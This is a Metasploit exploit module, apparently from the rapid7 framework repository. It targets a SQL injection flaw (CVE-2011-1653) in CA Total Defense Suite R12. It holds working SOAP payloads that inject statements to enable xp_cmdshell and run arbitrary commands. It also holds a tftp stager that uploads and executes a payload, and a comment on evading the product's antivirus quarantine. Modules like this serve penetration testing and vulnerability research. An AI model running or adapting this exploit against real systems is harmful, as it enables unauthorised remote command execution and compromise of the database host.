GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for CVE-2011-1653 (ZDI-11-134): SQL injection in the
# reGenerateReports stored procedure reached through CA Total Defense Suite R12's
# /UNCWS/Management.asmx SOAP endpoint, chained into xp_cmdshell for command
# execution on the database host.
#
# Indentation was lost in this listing; code is re-indented, but every string
# literal (the %q{} description and the %Q|| SOAP body) is kept byte-for-byte at
# column 0 because its whitespace is part of the runtime value.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  # CmdStager delivers the payload executable (tftp flavor, see 'CmdStagerFlavor'),
  # HttpClient sends the SOAP requests, EXE builds the payload binary.
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  # Registers module metadata and options.
  #
  # @param info [Hash] module metadata, merged through update_info
  #
  # Options: RPORT defaults to 34443, SSL defaults to true, and CMD is optional —
  # when set, exploit runs that single command through the injection instead of
  # staging a payload.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection',
        'Description' => %q{
This module exploits a SQL injection flaw in CA Total Defense Suite R12.
When supplying a specially crafted soap request to '/UNCWS/Management.asmx', an
attacker can abuse the reGenerateReports stored procedure by injecting arbitrary sql
statements into the ReportIDs element.
},
        'Author' => [ 'MC' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'ZDI', '11-134' ],
          [ 'OSVDB', '74968'],
          [ 'CVE', '2011-1653' ],
        ],
        'Targets' => [
          [
            'Windows Universal',
            {
              'Arch' => ARCH_X86,
              'Platform' => 'win'
            }
          ]
        ],
        'CmdStagerFlavor' => 'tftp',
        # Commands run in the SQL Server service context, hence Privileged.
        'Privileged' => true,
        'Platform' => 'win',
        'DisclosureDate' => '2011-04-13',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(34443),
        OptBool.new('SSL', [ true, 'Use SSL', true ]),
        OptString.new('CMD', [ false, 'Execute this command instead of using command stager', "" ])
      ]
    )
  end

  # Stages and runs the payload executable on a Windows target.
  #
  # The tftp host advertised to the target is this host's outbound source
  # address when SRVHOST is the 0.0.0.0 wildcard, otherwise SRVHOST itself.
  # execute_cmdstager drives execute_command below for each staged command
  # (CmdStager mixin convention; the mixin itself is not visible here).
  def windows_stager
    print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
    execute_cmdstager({ temp: '.', tftphost: tftphost })
    @payload_exe = generate_payload_exe

    print_status("Attempting to execute the payload...")
    execute_command(@payload_exe)
  end

  # Runs one OS command on the target through the SQL injection.
  #
  # Three statements are sent, each in its own SOAP 1.2 POST: enable
  # 'show advanced options', enable xp_cmdshell, then call xp_cmdshell with the
  # command. The first two steps exist because the module turns xp_cmdshell on
  # before using it; from a defender's side, an sp_configure/reconfigure change
  # on the database server and a POST to /UNCWS/Management.asmx whose ReportIDs
  # element begins with "'')" are the observable signals of this technique.
  #
  # @param cmd [String] command passed verbatim into "cmd.exe /c ..."
  # @param opts [Hash] unused; accepted to match the CmdStager callback signature
  # @raise via fail_with when any response is missing or lacks /SUCCESS/
  def execute_command(cmd, opts = {})
    # NOTE: This module was tested against the MS SQL Server 2005 Express bundled with
    # CA Total Defense Suite R12. CA's Total Defense Suite real-time protection
    # will quarantine the default framework executable payload. Choosing an alternate
    # exe template will bypass the quarantine.

    inject = [
      "'') exec master.dbo.sp_configure 'show advanced options', 1;reconfigure;--",
      "'') exec master.dbo.sp_configure 'xp_cmdshell',1;reconfigure;--",
      "'') exec master.dbo.xp_cmdshell 'cmd.exe /c #{cmd}';--",
    ]

    inject.each do |sqli|
      # Request body; the literal's whitespace is sent as-is, so it is left
      # exactly as in the original listing.
      soap = %Q|<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
<soap12:Body>
<reGenerateReports xmlns="http://tempuri.org/">
<EnterpriseID>msf</EnterpriseID>
<ReportIDs>#{sqli}</ReportIDs>
<UserID>187</UserID>
</reGenerateReports>
</soap12:Body>
</soap12:Envelope>
|

      # Second argument is the response timeout in seconds (HttpClient convention).
      res = send_request_cgi(
        {
          'uri' => '/UNCWS/Management.asmx',
          'method' => 'POST',
          'version' => '1.0',
          'ctype' => 'application/soap+xml; charset=utf-8',
          'data' => soap,
        }, 5
      )

      # The service is expected to answer with a body containing SUCCESS when the
      # procedure ran; no response (timeout) or any other body aborts the module.
      if (res and res.body =~ /SUCCESS/)
        # print_good("Executing command...")
      else
        fail_with(Failure::Unknown, 'Something went wrong.')
      end
    end
  end

  # Module entry point.
  #
  # With CMD set, runs that single command and returns without starting a
  # payload handler. Otherwise stages the payload for the 'win' platform and
  # hands off to the handler; any other target platform aborts.
  def exploit
    unless datastore['CMD'].blank?
      print_status("Executing command '#{datastore['CMD']}'")
      execute_command(datastore['CMD'])
      return
    end

    case target['Platform']
    when 'win'
      windows_stager
    else
      fail_with(Failure::Unknown, 'Target not supported.')
    end

    handler
  end
end
__END__
POST /UNCWS/Management.asmx HTTP/1.1
Host: 192.168.31.129
Content-Type: application/soap+xml; charset=utf-8
Content-Length: length
<?xml version="1.0" encoding="utf-8"?>
<soap12:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap12="http://www.w3.org/2003/05/soap-envelope">
<soap12:Body>
<reGenerateReports xmlns="http://tempuri.org/">
<EnterpriseID>string</EnterpriseID>
<ReportIDs>string</ReportIDs> <--boom!!
<UserID>long</UserID>
</reGenerateReports>
</soap12:Body>
</soap12:Envelope>